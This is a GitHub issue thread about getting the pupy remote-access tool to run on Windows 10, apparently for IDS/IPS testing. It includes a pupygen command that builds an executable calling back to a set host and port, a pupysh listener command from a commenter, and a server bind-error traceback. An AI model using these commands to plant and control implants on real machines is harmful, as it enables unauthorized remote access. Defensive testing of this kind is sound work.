### ISSUE TITLE
pupy does not run on Windows 10 client

### ISSUE THREAD

**Issue by totoroha** [n1nj4sec/pupy#182]
Dear ninjasec,

I tried to re-produce your program to test our IDS/IPS system. However, the program ran on windows 10 vmware, and nothing happened. I will tried to share as much information as i can.
1 - follow installation instruction on your page.
2 - run these commands in pupy linux machine:
sudo ./pupygen.py -f exe_x86 -o remote.exe connect --host 192.168.100.151:443
3. copy the remote.exe to windows 10. set up to run as administrator
4. ran the program and nothing happen.

Would you please tell me where i did it wrong?

Thank you so much.

P/S: Another error i encountered when tried with my external linux box.
[*] Server started on 68.68.68.68 port 4444 with transport ssl
>> ERROR:root:[Errno 99] Cannot assign requested address
Traceback (most recent call last):
  File "/root/pupy/pupy/pupylib/PupyServer.py", line 518, in run
    self.server = t.server(PupyService.PupyService, port = self.port, hostname=self.address, authenticator=authenticator, stream=t.stream, transport=t.server_transport, transport_kwargs=t.server_transport_kwargs, ipv6=self.ipv6)
  File "/root/pupy/pupy/network/lib/servers.py", line 225, in __init__
    ThreadPoolServer.__init__(self, *args, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/rpyc/utils/server.py", line 304, in __init__
    Server.__init__(self, *args, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/rpyc/utils/server.py", line 78, in __init__
    self.listener.bind((hostname, port))
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
error: [Errno 99] Cannot assign requested address

**Comment by void-in** [comment]
When you run the pupy payload on the Windows 10 machine, were you listening for the incoming connection? You need to start the pupy server on the specified port first and then execute the generated exe.
```
sudo ./pupysh.py --port 443
```

**Comment by totoroha** [comment]
i think this is the result you want to see:
[*] Server started on port 443 with transport ssl
